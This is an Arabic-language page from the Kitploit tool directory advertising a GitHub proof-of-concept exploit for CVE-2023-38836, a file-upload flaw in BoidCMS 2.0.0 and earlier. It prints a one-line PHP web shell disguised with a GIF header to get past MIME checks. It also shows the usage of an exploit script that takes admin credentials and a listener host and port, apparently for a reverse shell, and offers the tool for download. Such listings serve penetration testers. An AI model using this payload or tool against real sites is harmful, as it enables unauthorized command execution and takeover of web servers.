Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38836 — استغلال PoC لثغرة رفع الملفات في BoidCMS الإصدار <=2.0.0 | Kitploit
أدوات/GitHubGitHub/1337kid/cve-2023-38836
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHub1337kid/cve-2023-38836

CVE-2023-38836

استغلال PoC لثغرة رفع الملفات في BoidCMS الإصدار <=2.0.0

عرض المستودع
51منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2023-38836

ثغرة رفع الملفات في BoidCMS الإصدار 2.0.0 تسمح لمهاجم مُصادق برفع ملف من نوع خطير (CWE-434).
لاستغلال الثغرة، يمكن للمهاجم إضافة رأس GIF لتجاوز فحوصات نوع MIME.

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

الاستخدام

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

أداة استغلال لـ CVE-2023-38836

options:
  -h, --help            عرض رسالة المساعدة هذه والخروج
  -u URL, --url URL     رابط الموقع
  -U USER, --user USER  اسم مستخدم المسؤول
  -P PASSWD, --passwd PASSWD
                        كلمة مرور المسؤول
  -l LHOST, --lhost LHOST
                        المضيف المستمع
  -p LPORT, --lport LPORT
                        المنفذ المستمع

تنزيل الأداة